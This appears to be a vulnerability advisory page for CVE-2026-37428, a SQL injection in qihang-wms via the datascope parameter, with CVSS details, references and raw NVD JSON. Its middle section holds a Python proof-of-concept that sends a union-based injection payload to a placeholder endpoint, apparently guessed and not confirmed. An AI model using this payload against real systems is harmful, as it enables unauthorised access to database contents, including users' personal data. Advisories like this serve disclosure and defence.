CVE-2026-37428

Description

qihang-wms commit 75c15a was discovered to contain a SQL injection vulnerability via the datascope parameter in the SysDeptMapper.xml file. This vulnerability allows attackers to access sensitive database information, including users' Personally Identifiable Information (PII).

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

qihang-wms commit 75c15a

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL Placeholder (Based on vulnerability context)
target_url = "http://target-wms-endpoint/api/dept/query"

# Malicious payload demonstrating SQL Injection via datascope
# Attempting to extract database version using Union-based injection
payload = "1' UNION SELECT 1, version(), 3, 4--+"

# Vulnerable parameter identified in SysDeptMapper.xml
params = {
    "datascope": payload
}

try:
    # Sending the malicious request
    response = requests.get(target_url, params=params, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential Vulnerability Detected!")
        print("[+] Response Body:")
        print(response.text[:500]) # Print first 500 chars for verification
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-37428
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-37428
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-37428/
[4] VulDB https://vuldb.com/cve/CVE-2026-37428
[5] https://gist.github.com/Y4y17/6587147a37eba5b31de832e067f317ef
[6] https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/SQL%20injection%20vulnerability-1.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-37428", "sourceIdentifier": "[email protected]", "published": "2026-05-13T14:17:27.320", "lastModified": "2026-05-13T19:17:12.127", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "qihang-wms commit 75c15a was discovered to contain a SQL injection vulnerability via the datascope parameter in the SysDeptMapper.xml file. This vulnerability allows attackers to access sensitive database information, including users' Personally Identifiable Information (PII)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/Y4y17/6587147a37eba5b31de832e067f317ef", "source": "[email protected]"}, {"url": "https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/SQL%20injection%20vulnerability-1.md", "source": "[email protected]"}]}}